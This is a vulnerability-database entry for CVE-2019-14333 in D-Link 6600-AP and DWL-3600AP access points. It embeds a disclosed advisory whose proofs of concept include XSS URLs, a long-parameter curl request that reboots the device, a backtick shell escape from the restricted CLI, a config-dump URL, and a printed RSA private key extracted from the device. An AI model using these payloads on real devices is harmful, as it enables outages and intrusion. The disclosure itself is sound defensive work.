Details of VAR-201908-0911

ID

VAR-201908-0911

CVE

CVE-2019-14333

TITLE

D-Link 6600-AP and DWL-3600AP Vulnerability related to input validation on devices

Trust: 0.8

sources: JVNDB: JVNDB-2019-007261

DESCRIPTION

An issue was discovered on D-Link 6600-AP and DWL-3600AP Ax 4.2.0.14 21/03/2019 devices. There is a pre-authenticated denial of service attack against the access point via a long action parameter to admin.cgi. D-Link 6600-AP and DWL-3600AP The device contains an input validation vulnerability.Service operation interruption (DoS) There is a possibility of being put into a state. The D-Link 6600-AP and DWL-3600AP are both wireless access point devices from D-Link, Taiwan. There are security vulnerabilities in the D-Link 6600-AP and DWL-3600AP. An attacker could exploit the vulnerability to cause a denial of service and cause the device to reboot. # Security Advisory - 22/07/2019 ## Multiple vulnerabilities found in the D-Link 6600-AP device running the latest firmware (version 4.2.0.14). D-Link 6600-AP is not produced anymore but the support is still provided by D-Link as per described on the D-Link website. Not that this product is built for business customers of D-Link and we can expect to have thousands of devices at risk. Code base shared with DWL-3600AP and DWL-8610AP ### This advisory is sent to D-Link the 22/05/2019 Many Thanks to the D-Link Security Team for their prompt reactivity! ### Affected Product D-Link 6600-AP, DWL-3600AP + Vulnerability number 2 affects also DWL-8610AP ### Firmware version 4.2.0.14 Revision Ax date: 21/03/2019 ### Last version available https://eu.dlink.com/uk/en/products/dwl-6600ap-unified-wireless-n-simultaneous-dual-band-poe-access-point ### Product Identifier WLAN-EAP ### Hardware Version A2 ### Manufacturer D-LINK ## Product Description The DWL-6600AP is designed to be the best-in-class indoor Access Point for business environments. With high data transmission speeds, load balancing features, it can be deployed as a standalone wireless Access Point or used as the foundation for a managed wireless network. Source: https://eu.dlink.com/uk/en/products/dwl-6600ap-unified-wireless-n-simultaneous-dual-band-poe-access-point ## List of Vulnerabilities 1. CVE-2019-14338 - Post-authenticated XSS 2. CVE-2019-14334 - Post-authenticated Certificate and RSA Private Key extraction through http command 3. CVE-2019-14337 - Escape shell in the restricted command line interface 5. CVE-2019-14336 - Post-authenticated Dump all the config files (post-auth) 7. CVE-2019-14332 - Use of weak ciphers for SSH ### 1. Post-authenticated XSS #### Exploitation: Local #### Severity Level: High #### CVE ID : CVE-2019-14338 #### Proof-of concept Example 1: http://10.90.90.91/admin.cgi?action=<script>alert(document.cookie)</script> Example 2: http://10.90.90.91/admin.cgi?action=+guest<script>alert('Pwned')</script> ### 2. Post-authenticated Certificate and RSA Private Key extraction through http command #### Exploitation: Local #### Severity Level: High #### CVE ID : CVE-2019-14334 #### Proof-of concept http://10.90.90.91/sslcert-get.cgi? Result of the command: File "mini_httpd.pem" automatically extracted -----BEGIN RSA PRIVATE KEY----- MIIEowIBAAKCAQEAoGIBvZNlPN9AamssqnZj4Rmyox1t3OzN4KyAy5lI5inBHCee Hk5LPqKSS9hUn6Aia+ym6GYbYhrw2T7qSlXmdtIzqmC6ctw/1Zg/Nv7upcIj6s+o BioQrS3i++3pDqkenj7HqWb3NP7ExMmGEnzkMMVHGOkJew31VXBrI5d7INbaAg1B vsMYlUANfg96QLySyC6AwiZv55d6DpmgFzt7r8Yx6hkhZsxL9ZB4O8QnvEpjAL9t 7KUgVXtsO1FBYwp/elhK1nGtIcj1iq26G6e+vN61ePNjxIw3pwegbELrnc3b0f6c unyx9ntVNHC4yt3japRfFgxrMY4kgRgXfWej3wIDAQABAoIBAQCY25AJHPg6QhVk 1+zkMp4TJqjpad0R2OiHoCHI6rleFKGmseOzwq9YbR2+B9rvoHHuJskVamvi3wZ6 J8qpOqHC0ajIVBSf8GcurkJhqivN8/DDlVLxPRpT1A4oSqH7hRhXfkJRpH8sFT14 yRFtgXcDPKL8jO6qR61x1wlmDLQfoOPBnBjW9eDb5V5C/pNml3FgEs2XRh19py9Z 0AvKjyk/QJHRKSQ7cy2Qm5MFj9yulTFeTEVkXnPqOi8C0aZOqTFWxLi/TMUTHbsc fmDG0qkkiZMHw7K4kxWA1+ipkoBCCHjGoMrAOvyCm+MqapZQBScMMz2i13ekmADB i5Ka5fmRAoGBANT4rZONkQ/qFiPXTfwPSYCO9IPTJ+ZZQD1CbZt09r2HpN+bEfVb dAacfLWjPhG2hGlaYPDoGXqTN9llZI6qkR6TyutlOBbGG2TmR19cN60k3sgOm/eJ OztmyIWGeRsWlaP0Yvo+zySSzWOm1HdK0gLL+aJKd7/q9rtLxseCgxabAoGBAMDJ VuqAUWeKmrgMydgTlZ0IgtgcxpCwN1Spv0ECpygVrfPp0OCx+bsdajUBL/vha5Q9 J3JmaPC3rE0mIzhH7n0jrUkhSCCTfOo7+wSZzK2q6D+CykTLfm/zobeAy/Z+k7Wr H975ALD3R+qog44sGnBnznHZkYcRxYNy2/a6t1oNAoGAPJbnIwRykbmCRP4bFKvw uF9zVxG610DrEsKUVlbnX7J4iJkgedJj5wGcRTzFCtsHPsXUsJUHsqSxjerXufLy yGU5pNCuLWR9JK6S/aFJwbusmfP2EW18aYDraXmBeOBrADMl+ZXm7rvJLSGobqvd pagMREy1Vuds/IopaldKHiMCgYAQcNs1sm2+y8Y4Dfcksz7eHnyyG3ofmreNQ9Co paZFt9uW4ojKsMLgXzjQfmJuM6IuCS0VB4DJjpBmH+t/ADtpdqJviyQQiyNrAmR8 1vTqlpmp2OiRB12oBHn1IUnDorXMF2TnagrSDLSYYXiepko27dNgSDKt9ykF9cSm fPPn/QKBgFMVmV/rBJBHZvlOy00spSpbHXRnKqh+eTchjRfsUJJIxwJ08sI94dYS okObkFKhW+Kin1IjNv5EYBJBxBi/JOPRxuyS4WwCMM++NSgqmqjPdWxhQ1lD87px bgg22CyrDBw92O4AjPIln+OvdDCKgkwhQPFwBi5K1qKCvV08SrxY -----END RSA PRIVATE KEY----- -----BEGIN CERTIFICATE----- MIIDpTCCAo2gAwIBAgIEauy7rDANBgkqhkiG9w0BAQsFADB3MRQwEgYDVQQDEwsx MC45MC45MC45MTEVMBMGA1UEChMMRC1MaW5rIENvcnAuMRUwEwYDVQQLEwxELUxp bmsgQ29ycC4xFDASBgNVBAcTC1RhaXBlaSBDaXR5MQ4wDAYDVQQIEwVOZWlodTEL MAkGA1UEBhMCVFcwHhcNOTkxMjMxMjAwMDIxWhcNMTkxMjI2MjAwMDIxWjCBsTEU MBIGA1UEAxMLMTAuOTAuOTAuOTExFTATBgNVBAoTDEQtTGluayBDb3JwLjEVMBMG A1UECxMMRC1MaW5rIENvcnAuMRQwEgYDVQQHEwtUYWlwZWkgQ2l0eTEOMAwGA1UE CBMFTmVpaHUxCzAJBgNVBAYTAlRXMQswCQYDVQQGEwJUVzEUMBIGA1UEAxMLMTAu OTAuOTAuOTExFTATBgNVBAoTDEQtTGluayBDb3JwLjCCASIwDQYJKoZIhvcNAQEB BQADggEPADCCAQoCggEBAKBiAb2TZTzfQGprLKp2Y+EZsqMdbdzszeCsgMuZSOYp wRwnnh5OSz6ikkvYVJ+gImvspuhmG2Ia8Nk+6kpV5nbSM6pgunLcP9WYPzb+7qXC I+rPqAYqEK0t4vvt6Q6pHp4+x6lm9zT+xMTJhhJ85DDFRxjpCXsN9VVwayOXeyDW 2gINQb7DGJVADX4PekC8ksgugMImb+eXeg6ZoBc7e6/GMeoZIWbMS/WQeDvEJ7xK YwC/beylIFV7bDtRQWMKf3pYStZxrSHI9YqtuhunvrzetXjzY8SMN6cHoGxC653N 29H+nLp8sfZ7VTRwuMrd42qUXxYMazGOJIEYF31no98CAwEAATANBgkqhkiG9w0B AQsFAAOCAQEAb3SE7yOLixTbiSHvG/6QPGYYyo/Z7FcGOGya0wzw1MxG6lETYlSS 7A6Jm0b15VFuMOsDzucWNfLN8OfnImMpB9MqLhIU3gdx7yFpLw1ehXcrWK+TWqME 9SXIolyThrza9IV2I9+WKD4i7IfhIf4mm5OFyAh/vIpZQIpdjJiCOFKgCnihqYF5 beF63wqXndYsX2LkArXRhEWUmoRHQQgZoeEFTHhBYAlNbynXVkKKxTeFJZ24TDuE 45QTRcomj/vJAV94PM7cEAqUdHGM+HJxShcrODViwpSGiwiwCuuSxvo2wj3VLyef MjAqvgTdQBIKlTBaHnuQOm4FZmN6sJUEdQ== -----END CERTIFICATE----- ### 3. Pre-authenticated Denial of service leading to the reboot of the AP #### Exploitation: Local #### Severity Level: High #### CVE ID: CVE-2019-14333 #### Proof-of concept kali# curl -X POST 'http://10.90.90.91/admin.cgi?action=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA ### 4. Escape shell in the restricted command line interface #### Exploitation: Local #### Severity Level: High #### CVE ID : CVE-2019-14337 #### Proof-of concept DLINK-WLAN-AP# wget Invalid command. DLINK-WLAN-AP# `/bin/sh -c wget` BusyBox v1.18.2 (2019-01-24 14:39:11 IST) multi-call binary. Usage: wget [-c|--continue] [-s|--spider] [-q|--quiet] [-O|--output-document FILE] [--header 'header: value'] [-Y|--proxy on/off] [-P DIR] [--no-check-certificate] [-U|--user-agent AGENT][-T SEC] URL Retrieve files via HTTP or FTP Options: -s Spider mode - only check file existence -c Continue retrieval of aborted transfer -q Quiet -P DIR Save to DIR (default .) -T SEC Network read timeout is SEC seconds -O FILE Save to FILE ('-' for stdout) -U STR Use STR for User-Agent header -Y Use proxy ('on' or 'off') DLINK-WLAN-AP# ### 5. Post-authenticated Denial of service leading to the reboot of the AP #### Exploitation: Local #### Severity Level: High #### CVE ID : CVE-2019-14335 #### Proof-of concept http://10.90.90.91/admin.cgi?action=%s ### 6. Post-authenticated Dump all the config files #### Exploitation: Local #### Severity Level: High #### CVE ID : CVE-2019-14336 #### Proof-of concept http://10.90.90.91/admin.cgi?action= ### 7. Use of weak ciphers #### Exploitation: Local #### Severity Level: High #### CVE ID : CVE-2019-14332 #### Proof-of concept root@kali:~# ssh -l admin 10.90.90.91 -oKexAlgorithms=diffie-hellman-group1-sha1 The authenticity of host '10.90.90.91 (10.90.90.91)' can't be established. RSA key fingerprint is SHA256:X8FPwxBpaDJq77gKs/HxggThGUIXWH4nu6tukuW6PGI. Are you sure you want to continue connecting (yes/no)? yes Warning: Permanently added '10.90.90.91' (RSA) to the list of known hosts. admin@10.90.90.91's password: Enter 'help' for help. DLINK-WLAN-AP# help ## Report Timeline 22/05/2019 : This advisory is sent to D-Link - the contents of this Report will be made public within 30 days. 22/06/2019 : Public release of the security advisory to mailing list ## Fixes/Updates ftp://ftp2.dlink.com/PRODUCTS/DWL-3600AP/REVA/DWL-3600AP_REVA_FIRMWARE_v4.2.0.15.zip ftp://ftp2.dlink.com/PRODUCTS/DWL-6600AP/REVA/DWL-6600AP_REVA_FIRMWARE_v4.2.0.15.zip ## About me - pwn.sandstorm@gmail.com #### Independent EMSecurity Researcher in the field of IoT under the Sun #### Always open to hack and share #### Greetings - Ack P. Kim and others for the online resources

Trust: 2.34

sources: NVD: CVE-2019-14333 // JVNDB: JVNDB-2019-007261 // CNVD: CNVD-2019-29140 // VULHUB: VHN-146269 // PACKETSTORM: 153840

IOT TAXONOMY

category:

['Network device']

sub_category:

Trust: 0.6

sources: CNVD: CNVD-2019-29140

AFFECTED PRODUCTS

vendor:	dlink	model:	6600-ap	scope:	eq	version:	4.2.0.14	Trust: 1.0
vendor:	dlink	model:	dwl-3600ap	scope:	eq	version:	4.2.0.14	Trust: 1.0
vendor:	d link	model:	d-link 6600-ap	scope:	eq	version:	4.2.0.14	Trust: 0.8
vendor:	d link	model:	dwl-3600ap	scope:	eq	version:	4.2.0.14	Trust: 0.8
vendor:	d link	model:	6600-ap	scope:	-	version:	-	Trust: 0.6
vendor:	d link	model:	dwl-3600ap	scope:	-	version:	-	Trust: 0.6

sources: CNVD: CNVD-2019-29140 // JVNDB: JVNDB-2019-007261 // NVD: CVE-2019-14333

CVSS

SEVERITY

CVSSV2

CVSSV3

nvd@nist.gov:	CVE-2019-14333
value:	MEDIUM
Trust: 1.0
NVD:	CVE-2019-14333
value:	MEDIUM
Trust: 0.8
CNVD:	CNVD-2019-29140
value:	MEDIUM
Trust: 0.6
CNNVD:	CNNVD-201907-1639
value:	MEDIUM
Trust: 0.6
VULHUB:	VHN-146269
value:	MEDIUM
Trust: 0.1

nvd@nist.gov:	CVE-2019-14333
severity:	MEDIUM
baseScore:	4.9
vectorString:	AV:L/AC:L/AU:N/C:N/I:N/A:C
accessVector:	LOCAL
accessComplexity:	LOW
authentication:	NONE
confidentialityImpact:	NONE
integrityImpact:	NONE
availabilityImpact:	COMPLETE
exploitabilityScore:	3.9
impactScore:	6.9
acInsufInfo:	NONE
obtainAllPrivilege:	NONE
obtainUserPrivilege:	NONE
obtainOtherPrivilege:	NONE
userInteractionRequired:	NONE
version:	2.0
Trust: 1.8
CNVD:	CNVD-2019-29140
severity:	MEDIUM
baseScore:	4.9
vectorString:	AV:L/AC:L/AU:N/C:N/I:N/A:C
accessVector:	LOCAL
accessComplexity:	LOW
authentication:	NONE
confidentialityImpact:	NONE
integrityImpact:	NONE
availabilityImpact:	COMPLETE
exploitabilityScore:	3.9
impactScore:	6.9
acInsufInfo:	NONE
obtainAllPrivilege:	NONE
obtainUserPrivilege:	NONE
obtainOtherPrivilege:	NONE
userInteractionRequired:	NONE
version:	2.0
Trust: 0.6
VULHUB:	VHN-146269
severity:	MEDIUM
baseScore:	4.9
vectorString:	AV:L/AC:L/AU:N/C:N/I:N/A:C
accessVector:	LOCAL
accessComplexity:	LOW
authentication:	NONE
confidentialityImpact:	NONE
integrityImpact:	NONE
availabilityImpact:	COMPLETE
exploitabilityScore:	3.9
impactScore:	6.9
acInsufInfo:	NONE
obtainAllPrivilege:	NONE
obtainUserPrivilege:	NONE
obtainOtherPrivilege:	NONE
userInteractionRequired:	NONE
version:	2.0
Trust: 0.1

nvd@nist.gov:	CVE-2019-14333
baseSeverity:	MEDIUM
baseScore:	5.5
vectorString:	CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H
attackVector:	LOCAL
attackComplexity:	LOW
privilegesRequired:	LOW
userInteraction:	NONE
scope:	UNCHANGED
confidentialityImpact:	NONE
integrityImpact:	NONE
availabilityImpact:	HIGH
exploitabilityScore:	1.8
impactScore:	3.6
version:	3.1
Trust: 1.0
NVD:	CVE-2019-14333
baseSeverity:	MEDIUM
baseScore:	5.5
vectorString:	CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H
attackVector:	LOCAL
attackComplexity:	LOW
privilegesRequired:	LOW
userInteraction:	NONE
scope:	UNCHANGED
confidentialityImpact:	NONE
integrityImpact:	NONE
availabilityImpact:	HIGH
exploitabilityScore:	NONE
impactScore:	NONE
version:	3.0
Trust: 0.8

sources: CNVD: CNVD-2019-29140 // VULHUB: VHN-146269 // JVNDB: JVNDB-2019-007261 // CNNVD: CNNVD-201907-1639 // NVD: CVE-2019-14333

PROBLEMTYPE DATA

problemtype:	NVD-CWE-noinfo	Trust: 1.0
problemtype:	CWE-20	Trust: 0.9

sources: VULHUB: VHN-146269 // JVNDB: JVNDB-2019-007261 // NVD: CVE-2019-14333

THREAT TYPE

local

Trust: 0.6

sources: CNNVD: CNNVD-201907-1639

TYPE

input validation error

Trust: 0.6

sources: CNNVD: CNNVD-201907-1639

CONFIGURATIONS

sources: JVNDB: JVNDB-2019-007261

PATCH

title:	Security Advisory	url:	https://us.dlink.com/en/security-advisory	Trust: 0.8
title:	Security Bulletin	url:	https://www.dlink.com/en/security-bulletin	Trust: 0.8
title:	Patch for D-Link 6600-AP and DWL-3600AP Denial of Service Vulnerabilities	url:	https://www.cnvd.org.cn/patchInfo/show/177599	Trust: 0.6
title:	D-Link 6600-AP and DWL-3600AP Security vulnerabilities	url:	http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=95748	Trust: 0.6

sources: CNVD: CNVD-2019-29140 // JVNDB: JVNDB-2019-007261 // CNNVD: CNNVD-201907-1639

EXTERNAL IDS

db:	PACKETSTORM	id:	153840	Trust: 3.2
db:	NVD	id:	CVE-2019-14333	Trust: 3.2
db:	JVNDB	id:	JVNDB-2019-007261	Trust: 0.8
db:	CNNVD	id:	CNNVD-201907-1639	Trust: 0.7
db:	CNVD	id:	CNVD-2019-29140	Trust: 0.6
db:	VULHUB	id:	VHN-146269	Trust: 0.1

sources: CNVD: CNVD-2019-29140 // VULHUB: VHN-146269 // JVNDB: JVNDB-2019-007261 // PACKETSTORM: 153840 // CNNVD: CNNVD-201907-1639 // NVD: CVE-2019-14333

REFERENCES

url:	http://packetstormsecurity.com/files/153840/d-link-6600-ap-xss-dos-information-disclosure.html	Trust: 3.1
url:	https://us.dlink.com/en/security-advisory	Trust: 1.7
url:	https://www.dlink.com/en/security-bulletin	Trust: 1.7
url:	https://nvd.nist.gov/vuln/detail/cve-2019-14333	Trust: 1.5
url:	https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2019-14333	Trust: 0.8
url:	https://nvd.nist.gov/vuln/detail/cve-2019-14336	Trust: 0.1
url:	https://nvd.nist.gov/vuln/detail/cve-2019-14332	Trust: 0.1
url:	https://nvd.nist.gov/vuln/detail/cve-2019-14335	Trust: 0.1
url:	http://10.90.90.91/admin.cgi?action=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa	Trust: 0.1
url:	http://10.90.90.91/admin.cgi?action=%s	Trust: 0.1
url:	http://10.90.90.91/admin.cgi?action=+guest<script>alert('pwned')</script>	Trust: 0.1
url:	https://nvd.nist.gov/vuln/detail/cve-2019-14337	Trust: 0.1
url:	http://10.90.90.91/admin.cgi?action=<script>alert(document.cookie)</script>	Trust: 0.1
url:	https://nvd.nist.gov/vuln/detail/cve-2019-14334	Trust: 0.1
url:	http://10.90.90.91/sslcert-get.cgi?	Trust: 0.1
url:	https://nvd.nist.gov/vuln/detail/cve-2019-14338	Trust: 0.1
url:	https://eu.dlink.com/uk/en/products/dwl-6600ap-unified-wireless-n-simultaneous-dual-band-poe-access-point	Trust: 0.1
url:	http://10.90.90.91/admin.cgi?action=	Trust: 0.1

sources: CNVD: CNVD-2019-29140 // VULHUB: VHN-146269 // JVNDB: JVNDB-2019-007261 // PACKETSTORM: 153840 // CNNVD: CNNVD-201907-1639 // NVD: CVE-2019-14333

CREDITS

Sandstorm Security

Trust: 0.7

sources: PACKETSTORM: 153840 // CNNVD: CNNVD-201907-1639

SOURCES

db:	CNVD	id:	CNVD-2019-29140
db:	VULHUB	id:	VHN-146269
db:	JVNDB	id:	JVNDB-2019-007261
db:	PACKETSTORM	id:	153840
db:	CNNVD	id:	CNNVD-201907-1639
db:	NVD	id:	CVE-2019-14333

LAST UPDATE DATE

2024-11-23T21:52:00.729000+00:00

SOURCES UPDATE DATE

db:	CNVD	id:	CNVD-2019-29140	date:	2019-08-28T00:00:00
db:	VULHUB	id:	VHN-146269	date:	2020-08-24T00:00:00
db:	JVNDB	id:	JVNDB-2019-007261	date:	2019-08-06T00:00:00
db:	CNNVD	id:	CNNVD-201907-1639	date:	2020-08-25T00:00:00
db:	NVD	id:	CVE-2019-14333	date:	2024-11-21T04:26:31.713

SOURCES RELEASE DATE

db:	CNVD	id:	CNVD-2019-29140	date:	2019-08-28T00:00:00
db:	VULHUB	id:	VHN-146269	date:	2019-08-01T00:00:00
db:	JVNDB	id:	JVNDB-2019-007261	date:	2019-08-06T00:00:00
db:	PACKETSTORM	id:	153840	date:	2019-07-31T19:01:29
db:	CNNVD	id:	CNNVD-201907-1639	date:	2019-07-31T00:00:00
db:	NVD	id:	CVE-2019-14333	date:	2019-08-01T13:15:14.023